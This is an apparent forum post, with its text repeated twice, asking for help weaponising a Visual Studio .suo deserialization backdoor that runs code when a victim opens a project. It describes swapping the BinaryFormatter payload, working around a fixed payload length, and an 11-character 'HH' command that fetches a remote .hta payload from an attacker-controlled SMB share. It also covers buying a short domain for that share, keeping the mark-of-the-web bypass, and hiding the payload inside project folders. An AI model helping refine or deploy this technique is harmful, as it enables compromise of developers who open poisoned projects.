Recently I saw an interesting article and POC on github about backdooring visual studios projets. (https://github.com/cjm00n/EvilSln)
I liked it because there is no build events or other classical techniques that can be spotted by reading .sln
I will not re explain all the details of the vulns here, feel free to read the article.
I and a friend analized the POC and the package's code and figured out that BinaryFormatter is beeing used and TypeConfuseDelegate as gadget.
We are able to take the stream from the .suo's VsToolboxService, keeping existing buggy bytes headers and replace the serialized object by ours and it executes but only if the size of the payload is exactly the same as the original one.
for exemple "cmd /c calc" is the command wrapped in original payload, "taskmgr.exe" is also 11 and works too but taskmgr alone doesnt work. We tried a lot of payloads and te only way to RCE we found in 11 chars is :
qw.p beeing a public smbshare and x beeing a valid .hta file containing longer payload.
The issue with this technique is that 3 chars longs domains are expensive, so I though about https://handshake.org/ that make possible to buy a xx.p domain for 33$.
So my two first question is :
Is handshake domains compatible with HH winows command to resolve the smb address ?
There is still a hudge issue with this first technique, the deserialisation allows to bypass MOTW, so invoking a remote payload with HH will make me lose this advantage. It is bad
I try harded to understand the size limitation issue, I think I dont understand something with the stream's headers maby. This is my main problem / question, can someone help me to understand this length limitation ?
I am also working on a way to pack the .hta without extension somewhere in the project directories an invoke it in 11 chars but I don't like the idea of having the payload somewhere else that the .suo itself.
Contact me in private if you want to use matrix or xmpp to talk faster.
I totally unserstand that some people will have the solution but will fix it and keep it private. In this case rep+ for the idea and reproductions instructions
I liked it because there is no build events or other classical techniques that can be spotted by reading .sln
I will not re explain all the details of the vulns here, feel free to read the article.
I and a friend analized the POC and the package's code and figured out that BinaryFormatter is beeing used and TypeConfuseDelegate as gadget.
We are able to take the stream from the .suo's VsToolboxService, keeping existing buggy bytes headers and replace the serialized object by ours and it executes but only if the size of the payload is exactly the same as the original one.
for exemple "cmd /c calc" is the command wrapped in original payload, "taskmgr.exe" is also 11 and works too but taskmgr alone doesnt work. We tried a lot of payloads and te only way to RCE we found in 11 chars is :
HH \\qw.p\xqw.p beeing a public smbshare and x beeing a valid .hta file containing longer payload.
The issue with this technique is that 3 chars longs domains are expensive, so I though about https://handshake.org/ that make possible to buy a xx.p domain for 33$.
So my two first question is :
Is handshake domains compatible with HH winows command to resolve the smb address ?
There is still a hudge issue with this first technique, the deserialisation allows to bypass MOTW, so invoking a remote payload with HH will make me lose this advantage. It is bad
I try harded to understand the size limitation issue, I think I dont understand something with the stream's headers maby. This is my main problem / question, can someone help me to understand this length limitation ?
I am also working on a way to pack the .hta without extension somewhere in the project directories an invoke it in 11 chars but I don't like the idea of having the payload somewhere else that the .suo itself.
Contact me in private if you want to use matrix or xmpp to talk faster.
I totally unserstand that some people will have the solution but will fix it and keep it private. In this case rep+ for the idea and reproductions instructions